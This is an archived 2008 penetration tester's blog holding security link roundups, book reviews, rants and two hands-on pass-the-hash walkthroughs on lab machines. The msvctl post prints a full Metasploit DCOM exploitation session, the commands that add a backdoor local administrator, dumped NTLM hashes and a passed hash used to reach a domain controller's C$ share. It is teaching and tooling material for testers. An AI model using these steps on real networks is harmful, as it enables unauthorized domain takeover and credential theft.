Thursday, March 27, 2008

MSF & Karma ---- holy crap!


So phn1x gave a little writeup on his blog about MSF and KARMA integration. Guess HD Moore did a demo at AHA on it. Not like I needed any MORE reasons to be a metsploit fanboy (I have been for awhile) but that's a big one.

you read about it here:
http://hamsterswheel.com/techblog/?p=55
CG

SOURCE Boston 2008 talks on blip tv


someone sent me this link or posted on the security blogger's network (can't remember which) but I did find some time to watch two of the sessions from SOURCE Boston 2008 on blip.tv and thought I would pass them on to my 3 readers if they hadnt seen them.

http://sourceboston2008.blip.tv/

I watched Rich Mogull's Understanding and Preventing Data Breaches

and the l0pht Panel.

Rich's talk was really interesting right up until the video stops short of the talk finishing :-(

and the l0pht panel was really interesting as well. Those guys did so much for the industry it was really interesting to hear them talk about the "good ol' days" and see what they are all doing now.

To do: watch Dan Geer's keynote.

I also caught Chris Wysopal's talk at Black Hat D.C. on Classification and Detection of Application Backdoors. It was about all the "extra" code that was put into different projects and programs over the years and timelines of how long it took for those "additions" to be discovered.

Links!
presentation: http://www.blackhat.com/presentations/bh-dc-08/Wysopal-Eng/Presentation/bh-dc-08-beauchamp-wysopal-eng.pdf
whitepaper: http://www.blackhat.com/presentations/bh-dc-08/Wysopal-Eng/Whitepaper/bh-dc-08-beauchamp-wysopal-eng-WP.pdf
CG

pwning pwn2own and the system


So someone pwned2own a safari vulnerability to win a macbook air at cansecwest.

couple of bloggers did writeups on it:

dre over at TS/SCI
David Maynor over at Errata Security

I'm sure there is more.

The winner was Charlie Miller of Independent Security Evaluators

Checking out the site it looks like they have been doing work on OS X vulnerabilities and research into selling 0day. Interesting.

Link: The legitimate vulnerability market: the secretive world of 0-day exploit sales
Charles Miller, Independent Security Evaluators

To me it was brilliant marketing on behalf of ISE. I don't really deal with 0day with the exception of begging for them, but I imagine that a remote preauth on any of the 3 OS's involved in the pwn2own contest is worth way more than $20k on both the "dark side" and "good side" of "responsible" disclosure. On the other hand, ISE gets to be on the front page of every security mag and blog for the next few days for the price of giving up one client side exploit and they get $10,000 on top of it. Cheers guys. Job well done. Bonus points for pwning the system.

and more fun from: http://www.securityevaluators.com/independent_eva.html

Services we do not provide:

Don't pay us to run nessus

At ISE, we offer specialized expert security services. Therefore, we do not perform commodity services such as automated networks scans and firewall configuration.

Common Criteria

ISE also does not do Common Criteria evaluation.
Life is too short.

Nice!!

CG

Monday, March 24, 2008

Testing For Client Side Vulnerabilities


Lenny Zeltser has a good paper on Testing For Client Side Vulnerabilities:
http://www.zeltser.com/client-side-vulnerabilities/

He gives 3 attack scenarios when testing:

1. Track the clicks (low impact).
2. Plant a back door without exploitation (medium impact).
3. Exploit a client-side vulnerability (high impact).

Dean did a post about spear phishing during a pen-test, which basically covered the 1st option. We used google analytics to track who clicked on the initial link then a 2nd one for who actually entered data. Of course we dont know if that data was any good, but someone put "something" and hit the Enter button.

I would propose a 4th category which is i actually use the credentials to see if i can escalate on the network or data mine. its important to see just how much damage can be done when a user gives up a network logon to the badguy.

anyway, Lenny's paper is worth a read as well as taking a look at Jay Beale's talk on "They're Hacking Our Clients" http://toorcon.org/2007/talks/63/ClientVA-Toorcon9-Oct2007.pdf

They're is also an associated site that hasnt been updated since last year :-(
http://clientva.org/

I'm not one of those "security predictions" kind of people but organizations should start moving to conducting client side exploitation during pen tests as both a training event and to see what kind of access can be gained and damage done when credentials are obtained. instead of 1) saying we have training program so we are good or 2) saying yes we know our clients are jacked up so go ahead and just test the network defenses anyway.
CG

Get Your Learn On Thanks To Google


Pretty cool set of videos and presentation at : http://code.google.com/edu/

watched the web security ones today, I had seen Mike Andrew's one before, the Ajax ones look promising as well.
CG

Thursday, March 20, 2008

ChicagoCon 08


-Joe McCray & Chris are currently slated to do a workshop at ChicagoCon 08 on Saturday

-Chris is slated to talk about "New School Information Gathering" on Friday

-Dean is supposed to talk as well

Here are the details:

ChicagoCon 2008s: White Hats Come Together in Defense of the Digital Frontier

May 12 – 18, 2008

www.chicagocon.com

The Spring Edition of ChicagoCon features all new keynoters, additional security boot camps, exams on-site followed by a two-day ethical hacking conference. And without an exhibit hall full of sales pitches, you're free to learn from the pros, network with peers and advance your InfoSec career. Not just another boot camp or hacker con, ChicagoCon adds value to your training dollars with top instructors and well known certifications. 13 courses including CISSP, CEH, CHFI, Advanced Hacking, BackTrack to the Max (First Time EVER), Cisco, Microsoft, SANS, SOX, Security+ and more. The 2 days of “Con” Activities May 16 – 17 are only $100 (free for training students) and offers presentations, breakout sessions & hacking contests. >From the novice, to the ultimate techie, to the CISO chair... everyone interested in a career in security will find something at ChicagoCon, your one-stop shop for security training and certification. Keynotes: Geahan (FBI), Echemendia (Hacking Instructor), McOmie (TruTV's Tiger Team), Murray (Neohapsis) & Carpenter (SANS, Intelguardians). Presented by www.ethicalhacker.net.



CG

Metasploit Toolkit Book Review


Metasploit Toolkit for Penetration Testing, Exploit Development, and Vulnerability Research by David Maynor

2 Stars

Potential for something great was there but wasn't delivered

I'm going to take a harsh stance on this book, mostly because this book had potential to really build upon all the information publicly available for Metasploit and really make a great book on Metasploit internals and advanced usage. Instead it seems like current public/free information was just rehashed and new information not updated for the 3.x branch of MSF.

What I consider the "meat" of this book, and what should have made this a 4 or 5 star book, covers the Metasploit Framework 2.x branch and NOT the current 3.x branch. By "meat" I mean the case studies covering exploitation using MSF. The major difference between the two is that 2.x was written in Perl and 3.x in Ruby. To be fair the first 5 chapters cover using MSF 3.x, but I really didn't feel they covered much, if anything, that's not out on the net with the exception of Chapter 5 (Adding new Payloads). "Using" Metasploit has been covered a million times in a million other books. A book specifically on Metasploit should have covered things not covered in every other hacking book.

Chapter 1 is an "Introduction to Metasploit." If you haven't ever used the tool and didn't want to RTFM, then "maybe" it would be useful for you. Most of the material I felt could be found on the Metasploit main support page, the wiki, or via google, but mostly the first two. I'm also not sure why there are pages and pages of current payloads and exploits with no explanations as to why I would use one type of payload versus another especially for the obscure ones like find tag or ordinal payloads. Doing a "show exploits" or "show payloads" without dialogue on the differences adds little value. The Leveraging Metasploit on Penetration Tests section is one paragraph :-(

Chapter 2 is "Architecture, Environment, and Installation." There are 2-3 pages on locking down a system. Why is that included? Very random. Let me cover the installation covered in the book for you. Windows, double click the executable. *nix, download via svn. That's about the level of detail we get...sigh :-(

Chapter 3 is a whopping 7 pages including the FAQ section on "Metasploit Framework and Advanced Environment Configurations." That chapter covers what is in the directories of your msf installation and using the setg command.

Chapter 4 is "Advanced Payload and Add-on Modules." Covers some old information on meterpreter and some meterpreter basics, the stuff on the net covers it in far more detail. Decent coverage of the VNC Inject payload, crappy coverage of the PassiveX payload, ok coverage of auxiliary modules and a mention of db autopwn.

Chapter 5 is "Adding New Payloads." Chapter 5 is the best chapter in the book because it discusses something...here it goes...NEW! and related to MSF 3.x. Chapter 5 is an excellent chapter walking us thru building a SIP Invite spoofer auxiliary module. Had the whole book been of this caliber it would have been a 5 star book.

The case studies should have been rewritten to work with MSF 3.x, they are all for 2.x. They are good and contain the required detail (but I didn't not work through all the examples yet) Things are similar between the branches and you can probably muddle through the conversions but it makes no sense for the first half of the book to be about 3.x and the meat to be about 2.x. At a minimum a chapter or section on converting exploits from 2.x to 3.x was in order, but was not included.

I didn't find Appendix B, "Building a Test Lab for Penetration Testing" to be all that helpful either. I think it's a reprint from Penetration Tester's Open Source Toolkit v2, but can't confirm because I don't have that book.

CG

Tuesday, March 18, 2008

Air Force CyberCommand's General on Slashdot


I'm not a big fan of this whole cybercommand the AF is setting up, there are already so many people doing "cybersecurity" in/for DoD i'm not sure how this will help. This cybercommand doesnt seem to be in charge of anyone but AF people. I personally think the money would be better spent getting a standard for the whole .gov/.mil ironed out and finding a way to efficiently share information, resources, and workload among all the people currently doing cyber work instead of putting another child on the playground who wont play with everyone else.

anyway, what the hell do i know, on with the link:

http://interviews.slashdot.org/article.pl?sid=08/03/12/1427252
CG

Now this is loyalty to your client...


Well not really, how Rapid7 ditched Hannaford supermarkets:

http://attrition.org/security/rant/z/rapid7.html
CG

Monday, March 17, 2008

winexe for pass the hash action


JoMo-kun of the foofus crew has graciously published his patches to modify samba to use hashes and a patch for winexe (which is a linux psexec) to use hashes as well.

here's the link:
http://www.foofus.net/jmk/passhash.html

and here's a screenshot:

I don't believe I'll ever have to crack a password (least for windows) again :-) --take that NTLM and NTLMv2!
CG

Sunday, March 16, 2008

Shotgun Blast 17 March 08


Here is some pretty interesting (well i think so, it is MY blog) stuff going on out on the interwebs...

Are your devices pre-0wned?? Time to re-look that great deal on goods/labor we get from China http://www.veracode.com/blog/?p=82

FinCEN and how it helped catch Spitzer: http://blogs.zdnet.com/BTL/?p=8211

Weak passwords strike again: http://blog.liquidinfo.net/2008/03/case-of-weak-password.html

inguma 0.0.7.2, looks like the tool is coming around. looks like its time for another go with it:
http://sourceforge.net/forum/forum.php?forum_id=797281

XSS in SNMP web interfaces, check out Adrian Pastor's comment: http://www.sensepost.com/blog/2120.html#comments

Seven deadly pen-test sins: http://www.matasano.com/log/1026/seven-deadly-pen-test-sins/
and Mike Andrews commentary on it: http://www.mikeandrews.com/2008/03/15/seven-deadly-pen-test-sins/

(Ab)using scheduled tasks to elevate privileges over on sensepost blog/videos
http://www.sensepost.com/videostatic/ntupback/weaponised/index.html
http://www.sensepost.com/videostatic/ntupback/olly1/index.html

and Elevating Privileges using Sygate's Personal Firewall http://www.sensepost.com/videostatic/sygate/sygate.html
CG

Saturday, March 15, 2008

Using the Pash the Hash Toolkit


Thanks to Hernan for responding to my other post about msvctl (no thanks to the msvctl author for not responding to my email) and getting me motivated to check out his pashthehash toolkit v1.3.

I'm going to consider this post half finished because i dont think iam.exe and iam-alt.exe are working properly for me yet. hopefully Hernan will respond to this post or the comments i made on his blog and get me fixed up.

ok so on with it. the scenario goes that you have a local admin account on a box, which is easy to get from a remote exploit but no domain user permissions. From a data mining perspective or for further enumeration even domain user permissions are nice. At a minimum i can browse public shares in the domain for info.

ok first step is that i have already created my local admin account on the box, i've uploaded my tools whosthere-alt.exe, its dll and iam-alt.exe and its dll.

lets log in via psexec and run whosthere-alt.exe


we can see that we have logged in via our test account, and there is a vmware user account that proabably doesnt have any permissions. whosthere-alt.exe has a cool feature that it will listen indefinitely and log to a file, so you can start the process and wait for someone hopefully with domain admin to log into the box and it will capture those hashes for you.

let's check out the help options for whosthere-alt.exe and iam-alt.exe and using whosthere-alt.exe to capture logins for us.




as you can see in the image above; whoami says i am test/segfault and we start running whosthere-alt in logging mode (-i -o bigfun.txt) and then in the 2nd shell we check our bigfun.txt to see if anyone new has logged in and a user "root" has logged in.

from there we use iam-alt.exe to become user root, it appears from the output that its working i couldnt confirm that it was working, whoami.exe still said i was test and starting any processes resulted in them still being owned by test :-(


iam.exe/iam-alt.exe not working is not the end of the world though (in fact i'm sure its user error), if the account you gathered through whosthere.exe is admin+ you can still use the psexec module in metasploit to pass the hash as well and get yourself a shell.
CG

Hacking Exposed Web 2.0 Book Review


Hacking Exposed Web 2.0: Web 2.0 Security Secrets and Solutions by Rich Cannings, Himanshu Dwivedi, Zane Lackey, and Alex Stamos

Reliance on author's tool detracts from books potential

3 Stars

Thanks to McGraw-Hill for my review copy.

Based on my review criteria: http://carnal0wnage.blogspot.com/2008/03/book-review-criteria.html this book should have easily been a 4 or 5 star book, but I gave it 3 stars for its major flaw. Its major flaw is that it only talks about iSec partner's SecurityQA Toolbar as a tool for testing for the different types of web application vulnerabilities. Only discussing one closed source, for pay tool, that only runs on Windows is really disappointing from a security professional standpoint. I really expected a good snapshot in time on the DIFFERENT tools and techniques for doing web 2.0 auditing. There are tons of “for-pay” and more importantly FREE web application scanners and tools that look for the same vulnerabilities discussed in the book and the fact that they don't mention any other tools or methods is very disappointing.

Now that the above is out of the way...lets get on with the likes and dislikes.

Likes:
-The analysis of the samy worm is excellent. They break the code apart and really analyze what's going on and why it worked at the time.
-The chapter on ActiveX security is excellent. It covers a lot of ground on why ActiveX controls are bad, how to fuzz them and how to defend against them.
-The whole first part of the book on Web 1.0 vulnerabilities is well written, I had just finished XSS attacks and having that background helped a lot with the relevant chapters in HE Web 2.0.

Dislikes:
-The book is short, about 246 pages, that's probably too short for the price for a security book.
-A good chunk of the chapters cover over and over installing and using their SecurityQA Toolbar, I only need it once, if that.
-I think the book stops a bit short of actually exploiting Web 2.0 vulnerabilities. It talks a lot about identifying which 2.0 framework an application was built with and identifying different methods in that application, if debug functionality is enabled, and finding hidden URLs but how I exploit SQL injection issues or XPATH injection or LDAP injection issues IN web 2.0 applications is missing. That was the core problem with web 1.0, its still a valid and dangerous entry point for web 2.0 and should have been covered. Hacking Exposed is generally about exploiting vulnerabilities and not stopping at identifying them which is where the book seems to have stopped.

Overall the authors are obviously very knowledgeable about the subject. One of the other reviewers mentioned that it goes from technically very easy to very difficult even within chapters and I think this is true. The code sample for the examples they give are great and their explanations of web 1.0 and the web 2.0 threats is very well written with good examples. Like I said, had it not been for their fixation with their own tool as the only option we have for web 1.0 and 2.0 testing this would have easily been a 4 star book. For those a bit more interested in web 2.0 I would recommend checking out Shreeraj Shah's Web 2.0 Security and Hacking Web Services books and his website which has free web 2.0 auditing tools.

CG

Friday, March 14, 2008

carnal0wnage mention on ITSecurity.com


carnal blog got a shoutout over on IT Security.com

http://www.itsecurity.com/blog/20080310/why-life-is-tough-for-the-ethical-hackers/


CG

Wednesday, March 12, 2008

No Tech Hacking by Johnny Long Book Review


No Tech Hacking: A Guide to Social Engineering, Dumpster Diving, and Shoulder Surfing by Johnny Long

4 stars

Solid advice on securing the human vulnerability

Johnny Long has a great knack for taking what should be common sense observations on human vulnerabilities and making them unique, entertaining, and most importantly actionable. The book really seems to be a book to go along with his numerous “No Tech Hacking” talks he has given at several security conferences. If you want an example check out the 2007 Shmoocon Archives: shmoocon.org/2007/presentations.html

Here are the chapters:

Dumpster Diving
Tailgating
Shoulder Surfing
Physical Security
Social Engineering with Jack Wiles
Google Hacking
P2P Hacking
People Watching
Kiosks
Vehicle Surveillance
Badge Surveillance
Epilogue

All of the chapters are pretty good, I particularly liked the Physical Security, P2P Hacking, and Kiosks (even though it was a short chapter). Again, a lot of what he talks about is common sense and taken from his talks he gives a security conferences. But it comes from a guy that gets paid to break into buildings for a living so you can trust the advice and situations to be pretty close to reality.

Things I liked about the book:

-The Physical Security section talks about defeating different types of locks and security systems. It was good relevant content with good advice on how to fix it. The Kiosk chapter talks a little bit about breaking out of Kiosks and information you can gather. Using P2P to look for sensitive documents is a good idea as well. Really all the chapters had valuable information in them. In plain words he sums up relevant and dangerous security issues that target the human element of security.
-The large font and lots of pictures make the book a quick read. I also like that there were pictures to go along with all the points he was trying to make. His “arrest me face” on page 95 is the best.
-The book is pretty much without typos and editing issues which says a lot for a syngress book.
-The book is useful for both technicians and managers, I feel like i can give the book to both the techies and management and have them both get something out of it.


Some things I didn't like about the book:

-The book has a slight condescending tone. I think this is the author's attempt to be funny, and in person I think he could have pulled it off. But in print it really comes across as a “you are dumb, so dumb I have to write a book about hacking you without technology to show you how dumb you are.” It doesn't make the book “bad” its just annoying at times.
-The tailgating section (page 24) slams a person for wearing their badge INSIDE and says she is not security conscious. Why would you NOT where your badge inside? On one hand he complains about people not challenging him because of his fake badge or lack of a badge and then he says that wearing a badge inside is an opportunity for someone who sneaks in to take pictures of it, well guess what, they are already inside, there are other bigger issues now. In my opinion, badge on inside=good, badge on outside at lunch=bad.
-The book suffers a bit from the "Everything must be secure... damn the functionality" problem that a lot of security researchers and hard core security proposals suffer from. What I mean by all that is sometimes security people lose sight of why things are they way they are or the fact that changing the way things are done would hinder actually getting work done. The best example I can come up with from the book is his discussion of DoD decals on cars (in the vehicle surveillance chapter) and how they give away too much information. While not arguing his point on giving away information, I'd like to see his proposal for a better solution to access control on DoD bases. I'd also argue that oil change stickers showing where I got my oil changed (that may give you some information on where I live or work) are far less dangerous than that person just following me to home or work now that they have me and my car associated with one another.



CG

Book Review Criteria


I got an email asking how I base my reviews, so I came up with this as my stated review criteria.

5 stars: Book brought new detail or information to light, nothing else like it out there or a great update. Well written, few typos, well edited.

4 stars: Good information but nothing "new", written pretty well; good but not outstanding, has some issues.

3 stars: In some form or fashion the book has flaws whether it be editing or content, usually just average content.

2 stars: Shouldn't be used to start fires, but possibly pretty close.

1 stars: Probably shouldn't have been published and I want my money back, brings nothing of value whatsoever.

**Ideally, all those stars are qualified/explained with the write-up

If you disagree or have some things to add, PLEASE leave a comment :-)
CG

Tuesday, March 11, 2008

Another Blog's TSA Post and My TSA Rant


Pretty funny post here about a guy missing his flight because of his MacBook Air

http://www.michaelnygard.com/blog/2008/03/steve_jobs_made_me_miss_my_fli.html


and a TSA rant from my last trip:

While TSA didnt hold me up I would have preferred they did. Just got back from an overseas flight. We cram all our gear for assessments in those big black pelican cases. I spent about 45 minutes getting everything packed in there nice and tight and where nothing would rattle around and break, since I had signed for it and we have the "you break it, you bought it policy." So I get to the airport early, some times no ones cares about the big black case sometimes they do. I also got a nice fat padlock for it, again, sometime they care sometimes they don't.

That morning they did, but I got lucky. I must have had the most polite nice TSA guy i have ever met. He was like what's in the case, I'm like computer equipment, he's like ok, iI have to look inside whats the combo? He gets the case open, starts going through it. He's behind a screen so i can only see his head and not what he is doing. I go can you please make sure you put things back in there properly i have to pay if stuff gets broken and he's like sure sure no problem. I'm waiting outside the roped area to make sure it everything gets locked up properly and back on its way. Finally i hear him closing it up and lock and throw the thing on the conveyor belt, smiles and says everything is good to go and to have a nice flight.

I get to the hotel on the other end like 20 hours later and open the case. EVERYTHING is all over the place not even remotely where it was placed. harddrives, switches, cables all over the case and he even put the laptops back in with the screens facing out so a nice hard kick to the bottom of the case should have taken care of me getting any work done on the trip (will save that piece of knowledge for later). Anyway, just annoying that the guy was so nice all the while doing such a crappy job. Thankfully nothing was broken. I understand the need to protect us, and i'm glad people are there trying to do that, but if they cant have enough respect for our stuff to put it back in there right or allow US to put it back in there then don't open the crap up.
CG

Sunday, March 9, 2008

Observations on pen testing not in all those hacking books


I just got back from an assessment and wanted to do a real cool "Day in the life" type post. Unfortunately the customer was a pain in the ass (see #2), so no cool "how I owned blah.com" post. Check g0ne's blog for that. But here are a couple observations that aren't in any of those hacking books.

-Even though you were invited by someone in that organization to make security better, there are plenty of people in that organization that DIDN'T invite you and don't want you there. Especially if it requires them doing some work to get you IP space or a place to put all your gear or just requiring them get to get off their ass in general. Not to mention you are there to see how good a job they have been doing, and if they haven't been doing a good job...

-Be prepared to be blamed for any and all network issues that arise while you are there doing your assessment, even if you are out to dinner :-) The customer had a network outage occur while I was at dinner. Now even though DoS was not in the scope...instead of the admin's actually doing some work to determine the cause of the outage I was immediately blamed as doing a Denial of Service attack on the subnet. Apparently from outside the firewall AND through my phone AND while I was at dinner AND was able to make this happen a non-public network. How's that for some kung fu!

-Be prepared for that person that invited you in #1 to not be real thrilled when you succeeded. In fact, be prepared for them to be really pissed when you do your low tech hacking into their secure building or if you totally own their network.

**The rest of this probably is in some hacking book

-If you share IP space with people, building, and computers you have no control over, you may want to treat all those things as hostile into your network. Blindly trusting data and traffic coming from computers based on IP has never been a good thing and still isnt.

-Other things in the do not do list
* Do not broadcast your virtual meetings via VNC without authentication especially if you blindly trust IPs in your range that you don't control, watching briefings and meetings is always fun through unauthenticated VNC sessions.
* LM Hashes are just bad in so many ways I cant even start, especially if your patch policy is bad
* A password policy of no complexity, length or age requirements isnt much of a password policy

-CG
CG

Hacker Defender article now available on LSO


While not a total membership drive, my HackerDefender rootkit article is available over on LearnSecurityOnline for registered members

Link to article on hakin9
http://www.hakin9.org/en/haking/issues/6_2007.html

if someone has serious heartburn about not wanting to sign up, leave a comment and maybe i'll get motivated to put it on the carnal main site or email it to you.
CG

Wednesday, March 5, 2008

msvctl -- pass the hash action


msvctl is very similar to the pass the hash toolkit. i couldnt get the pass the hash to work on my XP SP1 VM joined to the LSOCORP domain and was too lazy to update it just to play.

you can read more on msvctl here:
http://truesecurity.se/blogs/murray/default.aspx

it essentially dumps current hashes from memory, you can then take one of those hashes and "pass it" and run commands as that user. so no more needing to crack hashes, you can pass it and be that person without it.

The scenario we find ourselves in at work, and why i am interested in getting this crap working is that, we pop a box on a domain with a remote exploit but we usually end up as SYSTEM. SYSTEM can do whatever it wants EXCEPT anything on the domain. i can do whatever i want on that box, but i dont have any privileges as far as the DC is concerned and that sux, because the goal is usually to be a domain or enterprise admin. we normally put a netcat type trojan in the startup folder and wait for an admin to log in, waiting sux, and i'm not a patient guy.

the demo in the link above he does with psexec, i'm on linux and things werent quite working out for me and it wasnt working with a meterpreter shell (probably a token issue thats probably why he did it with psexec). anyway, what i did was...

1. got a remote shell via dcom (yeah i know, if a demo, so shut up)

msf exploit(ms03_026_dcom) > exploit
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.29.129[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.29.129[135] ...
[*] Sending exploit ...
[*] The DCERPC service did not reply to our request
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (81931 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.29.1:40467 -> 192.168.29.129:4444)
msf exploit(ms03_026_dcom) > sessions -l

Active sessions
===============

Id Description Tunnel
-- ----------- ------
1 Meterpreter 192.168.29.1:40467 -> 192.168.29.129:4444

msf exploit(ms03_026_dcom) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >

2. created a temp directory and then uploaded msvctl.exe & msvctl.dll via meterpeter

meterpreter > upload
Usage: upload [options] src1 src2 src3 ... destination

Uploads local files and directories to the remote machine.

OPTIONS:

-r Upload recursively.
meterpreter > upload msvctl/msvctl_0.3/msvctl.exe msvctl.exe
[*] uploading : msvctl/msvctl_0.3/msvctl.exe -> msvctl.exe
[*] uploaded : msvctl/msvctl_0.3/msvctl.exe -> msvctl.exe
meterpreter > upload msvctl/msvctl_0.3/msvctl.dll msvctl.dll
[*] uploading : msvctl/msvctl_0.3/msvctl.dll -> msvctl.dll
[*] uploaded : msvctl/msvctl_0.3/msvctl.dll -> msvctl.dll


3. created a local account on the box and added it to the local admin group

meterpreter > execute -f cmd.exe -i -c -H
Process 404 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32\temp>net user localfun localfun /add
net user localfun localfun /add
The command completed successfully.

C:\WINDOWS\system32\temp>net localgroup administrators localfun /add
net localgroup administrators localfun /add
The command completed successfully.

4. logged into the box with my new local account via RDP

5. to test privileges i tried to map to the C drive of the domain controller

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\localfun>net use \\192.168.29.128\c$
The password or user name is invalid for \\192.168.29.128\c$.

Enter the user name for '192.168.29.128': localfun
Enter the password for 192.168.29.128:
System error 1326 has occurred.

Logon failure: unknown user name or bad password.

6. CD'ed into the msvctl temp directory and did a list to see what hashes were available. we see that we our credentials and domain user chris has logged on recently.


C:\WINDOWS\system32\temp>msvctl.exe list
luid 0-165157
XPSP1VM\localfun b5176bbcf86d7dc8e72c57ef50f76a05:cad3f54ce9a87c015262d0ae60bcb
d6d
luid 0-148121
LSOCORP\chris 19fe4717a7c8b55daad3b435b51404ee:f2c0c177de720154d024a26e09f0feb3

luid 0-43007
luid 0-997
luid 0-996
LSOCORP\XPSP1VM$ 00000000000000000000000000000000:70b9157dabc8abfe803e3fa4e4af4
d1a
luid 0-31757
LSOCORP\XPSP1VM$ 00000000000000000000000000000000:70b9157dabc8abfe803e3fa4e4af4
d1a
luid 0-999



7. inject a cmd.exe using LSOCORP\Chris hash and get a cmd.exe shell with his permissions.

C:\WINDOWS\system32\temp>msvctl.exe LSOCORP\chris 19fe4717a7c8b55daad3b435b51404
ee:f2c0c177de720154d024a26e09f0feb3 run cmd
info: running 'cmd '

**at this point i had another cmd.exe shell pop up, i was then able to map a share to the domain controller using that cmd.exe

C:\WINDOWS\system32>net use * \\192.168.29.128\C$
Drive Z: is now connected to \\192.168.29.128\C$.

The command completed successfully.

C:\WINDOWS\system32>net use
New connections will be remembered.

Status Local Remote Network

-------------------------------------------------------------------------------
OK Z: \\192.168.29.128\C$ Microsoft Windows Network
\\.host VMware Shared Folders
The command completed successfully.


C:\WINDOWS\system32>z:

Z:\>dir
Volume in drive Z has no label.
Volume Serial Number is 9CB6-7878

Directory of Z:\

05/04/2004 12:41 PM 0 AUTOEXEC.BAT
05/04/2004 12:41 PM 0 CONFIG.SYS
09/05/2007 02:44 PM Documents and Settings
08/12/2007 10:55 AM Inetpub
05/04/2004 03:54 AM Program Files
09/16/2007 01:57 PM WINDOWS
05/04/2004 12:42 PM wmpub
2 File(s) 0 bytes
5 Dir(s) 2,025,148,416 bytes free

Z:\>



8. Have peanutbutter jelly time :-)

**Now in this case we dont know that Chris is a local admin, but for the example he is. I also thought that doing a net user /domain or a net group /domain from that shell would return the information but it did not ;-( that's something to look in to.

TODO, get it working with psexec and see if can pull information from the domain with that shell


CG

Tuesday, March 4, 2008

Firewire port == owned


"A security consultant (Adam Boileau) based in New Zealand has released a tool that can unlock Windows computers in seconds without the need for a password.

To use the tool, hackers must connect a Linux-based computer to a Firewire port on the target machine. The machine is then tricked into allowing the attacking computer to have read and write access to its memory.

With full access to the memory, the tool can then modify Windows' password protection code, which is stored there, and render it ineffective."

Very cool, of course most people know that if you have physical access to a computer its essentially yours anyway. The idea was originally presented in 2006 at Ruxcon, and now the code is released...now where did i put that firewire cable...

Article Link: http://www.smh.com.au/news/security/hack-into-a-windows-pc--no-password-needed/2008/03/04/1204402423638.html

Code Link: http://storm.net.nz/projects/16
CG

Monday, March 3, 2008

Thin Client Hacking


g0ne has a good post over on his blog about hacking thin clients, probably worth the 30 seconds to read.

http://vmarve.blogspot.com/2008/03/debunk-thin-client-good-security.html

bottom line is that even if you "flash" the drive every nite or if its non-persistent you might want to make sure the "fresh" image isnt vulnerable to some old ass remote exploit :-)
CG

Saturday, March 1, 2008

more on user training vs. technical solutions


I did a post about a post on Rational Surviability:
http://rationalsecurity.typepad.com/blog/2008/02/mcgoverns-ten-m.html

I left the comment below and got the response underneath it. Figured I'd address it on here first then cut and paste over there...

---

My comment:

what is the fix to your #4? You can only stick so many technical barriers in place to prevent your users from opening and clicking on emails they shouldnt. why does it seem like the whole industry is saying that users cannot be trained?

Link: http://rationalsecurity.typepad.com/blog/2008/02/mcgoverns-ten-m.html#comment-105104958

---
Posted by: Rich Kulawiec

Re: CG's comments.

If you are running an operating system/mail client environment that is susceptible to attacks launched by users clicking on attachments -- which they have done without letup since there have been attachments to click on and GUI mail clients that permit them to click, and which they will continue to do no matter what you or I or anyone else ever tells them -- then your software environment is broken. Fix it.

**I guess i'm ignorant, what magical OS and mail system do you propose that allows the functionality that most people have come to expect from a Windows environment?

Part of that fix, if you're not willing to upgrade to superior operating system/mail client software that is immune to this rudimentary problem, might consist of configuring your mail servers to disallow all attachments by default and only permit those for which there is a business need.

**how do I determine for a large organization what is a business need for each individual? what happens when i guess incorrectly? how doest that scale? realistically how do you propose that is done? again in a Windows environment how do you suddenly say you cant email your powerpoint, excel, and word or pdf documents? or do I allow those even though i can trojanize those?

This is by no means a panacea -- fixing/replacing the broken software is clearly a far better idea -- but it can at least partially mitigate the problem, and it's certainly much better than permitting all attachment types by default.

**what if the malware comes through in normal MS office documents?? do i strip all of those out by default?

As to educating users, it's one of the dumbest ideas in security. As Marcus Ranum has famously pointed out, if it was going to work...it would have worked by now. If you are relying on user education as part of your strategy, you are doomed. See "The Six Dumbest Ideas in Security" for a fine explanation of this.

**I don't know Marcus, but some of that list is pure garbage, especially #4. But back to #5, are you proposing i wait for the next generation of people who are going to magically become better educated without any training to come and fill those seats of user's now? that's just fucking stupid. If users can never be fixed"if it was going to work, it would have worked by now" then why havent we developed a technical solution that works yet? Oh yes, its because the code is broken too, and the fix for that is writing secure code from the start...i'm still waiting for my "securely coded" application to replace everything else that is already in place.

"A better idea might be to simply quarantine all attachments as they come into the enterprise, delete all the executables outright, and store the few file types you decide are acceptable on a staging server..."

and what if the malware comes in via files I allow? what now? A good example would have been the adobe mailto exploit that just came out (now patched). how would your solution have stood up to that? I shouldnt allow pdf's in?

what about when i am stripping out attachments from the CEO or some other high level person that doesnt care about security who just needs to get work done. I guess if you have a network of computer literate people those types of solutions become viable. for the rest of us not working in fantasy land, those suggestions are just crap.

Link: http://rationalsecurity.typepad.com/blog/2008/02/mcgoverns-ten-m.html#comment-105150280

-CG

CG